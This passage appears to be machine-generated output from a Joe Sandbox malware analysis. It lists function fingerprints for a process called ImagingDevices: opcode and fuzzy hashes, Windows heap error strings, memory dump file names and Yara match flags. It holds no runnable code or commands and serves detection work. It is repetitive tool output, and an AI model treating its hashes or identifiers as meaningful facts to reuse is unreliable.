                                                                                                  • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 008EDC30
                                                                                                  • HEAP: , xrefs: 008EDC1C
                                                                                                  • HEAP[%wZ]: , xrefs: 008EDC0F
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                                                                  • API String ID: 0-212623055
                                                                                                  • Opcode ID: cc64a4fb081aab149d33dec8d527b113b1b38c57b6608ef770904c1951e495b0
                                                                                                  • Instruction ID: b6f0694cffab4d5d3ea15fd4f72a14cc11a7a707b8bf0edf7f505cbbb8db0d5e
                                                                                                  • Opcode Fuzzy Hash: cc64a4fb081aab149d33dec8d527b113b1b38c57b6608ef770904c1951e495b0
                                                                                                  • Instruction Fuzzy Hash: 6072DD71A002999FDF25DF69C840BBDBBF0FF09314F188059E896EB292D335A945DB60
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-2419525547
                                                                                                  • Opcode ID: c8c64136587d1a43a049c424e89962d9ef0c37344b53bf71efc47911069173ad
                                                                                                  • Instruction ID: 5e2a92eee929bd657140d72a022f37caf20db1ac376bd93fdb8db801af9ddc88
                                                                                                  • Opcode Fuzzy Hash: c8c64136587d1a43a049c424e89962d9ef0c37344b53bf71efc47911069173ad
                                                                                                  • Instruction Fuzzy Hash: 9E72AB7060025ADFDB28DF19C490ABAB7B1FF46714F1980AAE886CB356D770ED41CB91
                                                                                                  Strings
                                                                                                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 008ED65A
                                                                                                  • HEAP: , xrefs: 008ED646
                                                                                                  • HEAP[%wZ]: , xrefs: 008ED639
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                  • API String ID: 0-2419525547
                                                                                                  • Opcode ID: 9c74a3b8fb92716de5db25fa717cae8e18635534fa29f084d3219378e963dd64
                                                                                                  • Instruction ID: 8d12d1aae17ae17160d4d0ef17a1d3edde0647e4885aaac566f331631ca79bcf
                                                                                                  • Opcode Fuzzy Hash: 9c74a3b8fb92716de5db25fa717cae8e18635534fa29f084d3219378e963dd64
                                                                                                  • Instruction Fuzzy Hash: A802BB70600249DFCB28DF29C491ABABBA1FF55304F18845EE896CB286D735E954DBA0
                                                                                                  Strings
                                                                                                  • HEAP: , xrefs: 008E9623
                                                                                                  • HEAP[%wZ]: , xrefs: 008E9616
                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 008E9636
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                                                                  • API String ID: 0-385592399
                                                                                                  • Opcode ID: eb139e48cedb62ddecf0828597a16f7222efecbd70adfdfd13d2e73fe3b4a309
                                                                                                  • Instruction ID: 86e395b75b50eb6eebbc321a31bf4c67c089bc80ff562b69f037aca93fd25f0d
                                                                                                  • Opcode Fuzzy Hash: eb139e48cedb62ddecf0828597a16f7222efecbd70adfdfd13d2e73fe3b4a309
                                                                                                  • Instruction Fuzzy Hash: 96D1CD71A0065ADFDB24CB69C480BBAB7F0FB49304F188199E551DB385E738ED61DB50
                                                                                                  Strings
                                                                                                  • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 008F2D1F
                                                                                                  • HEAP: , xrefs: 008F2D14
                                                                                                  • HEAP[%wZ]: , xrefs: 008F2D07
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                  • API String ID: 0-1596344177
                                                                                                  • Opcode ID: 7c5ef6d0d6a8b2be0edde7f5fe8225be7d4e369f3ce0d975bf33056e8a3e23c2
                                                                                                  • Instruction ID: 923fa91884ab739f8ac40832dab286ab55674ea74f564a9723cd0e8114bf3a3a
                                                                                                  • Opcode Fuzzy Hash: 7c5ef6d0d6a8b2be0edde7f5fe8225be7d4e369f3ce0d975bf33056e8a3e23c2
                                                                                                  • Instruction Fuzzy Hash: F1B19C7160060ACFDB28CF28C494A79B7F1FF49315F1586A9E866CBB92D730E980DB50
                                                                                                  Strings
                                                                                                  • Heap block at %p modified at %p past requested size of %lx, xrefs: 009158F7
                                                                                                  • HEAP: , xrefs: 009158E4
                                                                                                  • HEAP[%wZ]: , xrefs: 009158D7
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                                                                  • API String ID: 0-3722492067
                                                                                                  • Opcode ID: 6efc3fdcf3ca06c67a9f1debcbf50bb2615130285867c5c2f9cb8ffe601b3b69
                                                                                                  • Instruction ID: 843bf25f30fa4fdaa05e21f50e807acb792888641a59dcc377400ab191b54db4
                                                                                                  • Opcode Fuzzy Hash: 6efc3fdcf3ca06c67a9f1debcbf50bb2615130285867c5c2f9cb8ffe601b3b69
                                                                                                  • Instruction Fuzzy Hash: 7941F375310918DFD3609E19C841AF273E5EF84750B978899F8D6CB282D729D886EB60
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *.*$MUI
                                                                                                  • API String ID: 0-3752369296
                                                                                                  • Opcode ID: a346e8251f37367d2682038a8a3f3f24818dd7758287a5f5a542c24f5d4a1d86
                                                                                                  • Instruction ID: 3bfeefe65dd241f0221e4052f924f9d616302914dc1c15e1c748e67914b9a85e
                                                                                                  • Opcode Fuzzy Hash: a346e8251f37367d2682038a8a3f3f24818dd7758287a5f5a542c24f5d4a1d86
                                                                                                  • Instruction Fuzzy Hash: 7EC14D359056289ACB71DB28CC89BAAB7B8EF49300F0485D9E449E7290EB749FC4CB51
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $
                                                                                                  • API String ID: 0-227171996
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: gfff$5
                                                                                                  • API String ID: 0-2378412342
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8@8
                                                                                                  • API String ID: 0-222468769
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (
                                                                                                  • API String ID: 0-3887548279
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (
                                                                                                  • API String ID: 0-3887548279
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: __aullrem
                                                                                                  • String ID:
                                                                                                  • API String ID: 3758378126-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @
                                                                                                  • API String ID: 0-2766056989
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: [Pj
                                                                                                  • API String ID: 0-2289356113
                                                                                                  • Opcode ID: 1663a565ab183fbfeeb48216b32bf9dc7fb73022466df3339a3496dfb6946d51
                                                                                                  • Instruction ID: 0ce55c395ab72937bc7c9986906d7fe69b6223aab5b21fe1ecc1061ca2dca925
                                                                                                  • Opcode Fuzzy Hash: 1663a565ab183fbfeeb48216b32bf9dc7fb73022466df3339a3496dfb6946d51
                                                                                                  • Instruction Fuzzy Hash: E9F09631208744BBD7129B10CC85F2A7BA9FF85764F14C41CF549AA1D7D776C811EB22
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 7a354022780c619e2f474b2190f2219d15a4ef62e1a6ef39868e59a0d1fba5de
                                                                                                  • Instruction ID: eec3b24c7b08eb1f01dadb9782734aa9946e87fe6b4c6c325ca14c1a433ef8fe
                                                                                                  • Opcode Fuzzy Hash: 7a354022780c619e2f474b2190f2219d15a4ef62e1a6ef39868e59a0d1fba5de
                                                                                                  • Instruction Fuzzy Hash: C072D071E0021D9FDF15CFA8C881BEEBBF9BF48300F198029E955AB291D7799985CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c4b65cac88941aa139d1b747a92123c247783b3d38ca169daa9e3dd2f0ac096
                                                                                                  • Instruction ID: 9b8a9b72d70d0605ce38bcdf9ab6795e704ad2539a92bf6614d0c07f7cd25230
                                                                                                  • Opcode Fuzzy Hash: 5c4b65cac88941aa139d1b747a92123c247783b3d38ca169daa9e3dd2f0ac096
                                                                                                  • Instruction Fuzzy Hash: 1A62927680494AEFCF18CF08D4904AEFB62FA51314B65C75AC8AAA7704D331BE54CBD2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 51ad3c276c367dbf4d4f6bc93ad0224d44d6673dfdd6cc4bba56842f2bea4f38
                                                                                                  • Instruction ID: 5d80ffbc1602801b2bc80fd1642f56fc518d7241347036e3f3640e17319c9f21
                                                                                                  • Opcode Fuzzy Hash: 51ad3c276c367dbf4d4f6bc93ad0224d44d6673dfdd6cc4bba56842f2bea4f38
                                                                                                  • Instruction Fuzzy Hash: 99529565A0462BCBC7108F1AC4800F9B7A3FFF9311719C156EC914B3A5E6B996E1EBD0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                                                                  • Instruction ID: 8105c557ab85b7292f4c61937c43d24a40909692a6b6dd5c4a593eb44872254c
                                                                                                  • Opcode Fuzzy Hash: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                                                                  • Instruction Fuzzy Hash: 6C128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9a058e9ba46eab0b6bc3682cc8be9c9e92a01f7672dcbf8376456b8a694a4e40
                                                                                                  • Instruction ID: 5063a8127bda7c49fc76bc521130147c69e03575eb6527e7edbaa7075a54920b
                                                                                                  • Opcode Fuzzy Hash: 9a058e9ba46eab0b6bc3682cc8be9c9e92a01f7672dcbf8376456b8a694a4e40
                                                                                                  • Instruction Fuzzy Hash: 6B42FA72818236CFC7204F05C4A01B67BA1FF6875572A446EEDC21BB91E7789A91F7E0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fbfc32c196d61b767b6a6a8132ee964692caf7711aa8cb9cea579ec6da776bf1
                                                                                                  • Instruction ID: 59e967fe57cd5e2e6df2cc85123fed5d1dc48b8c1e2538e2ac86111eba65a324
                                                                                                  • Opcode Fuzzy Hash: fbfc32c196d61b767b6a6a8132ee964692caf7711aa8cb9cea579ec6da776bf1
                                                                                                  • Instruction Fuzzy Hash: 2A328971E002199FDB15CF98C881BEEFBF5FF48304F19805AE859AB251D735A981CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e9bf8e2060619415f811d5769a4d91fd693ce594ecb1947689e297aeb271b434
                                                                                                  • Instruction ID: a311c805f3ff1058dfca7adfd180c1a4b74411923ceaf2b58dc7d562fac5dae7
                                                                                                  • Opcode Fuzzy Hash: e9bf8e2060619415f811d5769a4d91fd693ce594ecb1947689e297aeb271b434
                                                                                                  • Instruction Fuzzy Hash: 7A2288B1900618CFDB24CFA8D884AEDBBF4FF08314F15856AE859BB291D375A885CF54
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cb2938d440f582dd7e6c9f0390cb7aecfc182f6c7e12175bd79fa6095ad5dc3d
                                                                                                  • Instruction ID: 98d5d42fd4ddc5f87a691ff20124fd97feb39abf19e2915b972f203cbd62c936
                                                                                                  • Opcode Fuzzy Hash: cb2938d440f582dd7e6c9f0390cb7aecfc182f6c7e12175bd79fa6095ad5dc3d
                                                                                                  • Instruction Fuzzy Hash: 4802C333D49BB74B8F715EF944E052A7EA0AE0169031F87E9DDC0BF296C116DD0A96E0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3db4aff7ae743eae0f5b64c8dc9487327da86f4be592e369025056bd2969c8d4
                                                                                                  • Instruction ID: c0a45c8260f345aa6d1d09f14a5a11b2eac41cd3e0e247d7c467d4cc84447221
                                                                                                  • Opcode Fuzzy Hash: 3db4aff7ae743eae0f5b64c8dc9487327da86f4be592e369025056bd2969c8d4
                                                                                                  • Instruction Fuzzy Hash: 6812D1743192599BDB29CF29C4847F2B7E4BF05300F148899ECD68B692D378E9D1DB60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                                                                  • Instruction ID: 5c3681690a9940a1eac77f33c6db856b529c5c9dccfbd669bbd0c2f874c321f0
                                                                                                  • Opcode Fuzzy Hash: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                                                                  • Instruction Fuzzy Hash: 5A916A70604219DFDB28CF54C490EBABBB5FF49304F2982AEE9868B356D730AC40CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
